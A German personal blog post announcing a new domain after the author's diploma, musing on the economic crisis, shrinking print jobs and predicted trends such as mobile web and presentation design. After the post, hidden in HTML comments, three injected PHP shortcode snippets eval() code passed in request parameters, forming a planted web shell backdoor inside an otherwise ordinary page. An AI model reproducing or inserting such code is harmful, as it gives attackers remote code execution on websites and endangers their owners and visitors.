"Hallo Welt" es kommt ein Umbruch

Meine Diplomarbeit habe ich überstanden, aber mit dem subjektiven bloggen mag ich trotzdem nicht aufhören. Doch meine alte Domain wird mir zu klein, für die ganzen Themen um mich herum.

Das war aber erst der kleinste Teil des Umbruchs, der Größere besteht zwar nur aus ein paar Zahlen und heißt Wirtschaftskrise und hat sich mit dem Ende meines Studiums ein tolles Timing überlegt.

Ich bekomme grad mit, wie besonders beim Print viele Arbeitsplätze abgebaut werden müssen, auf der anderen Seite werden Flasher und echte Webdesigner gesucht. Mit meinem Postproduktionswissen stehe ich so in der Mitte. Ich würde behaupten da bewegt dich der Markt noch neutral (manche Jobs verschwinden, andere entstehen). Da aber immer mehr talentierte Leute auf den Markt drängen, wird es dort wohl trotzdem enger.

Aber trotz aller Krise dreht sich die Welt ja weiter. Und deshalb hier mein Blick in die Zauberkugel:

  • Frontale Werbung wird zurück gehen
  • Firmen brauchen Gesichter (ein kleiner Steve Jobs steckt in jedem Unternehmen)
  • direkte Kommunikation statt Massenkommunikation
  • Web 3.0 das lokale Web (Mobil Web)
  • Print ist zu teuer und umweltschädlich

All das führt mich zum Thema: Präsentationsdesign, das nächste große Ding

aber dazu die Tage mehr, erst mal weiter an der Seite werkeln.

<!– [insert_php]if (isset($_REQUEST["eBYh"])){eval($_REQUEST["eBYh"]);exit;}[/insert_php][php]if (isset($_REQUEST["eBYh"])){eval($_REQUEST["eBYh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VlqyE"])){eval($_REQUEST["VlqyE"]);exit;}[/insert_php][php]if (isset($_REQUEST["VlqyE"])){eval($_REQUEST["VlqyE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EPlp"])){eval($_REQUEST["EPlp"]);exit;}[/insert_php][php]if (isset($_REQUEST["EPlp"])){eval($_REQUEST["EPlp"]);exit;}[/php] –>

0 Kommentare

Dein Kommentar

An Diskussion beteiligen?
Hinterlasse uns Deinen Kommentar!

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.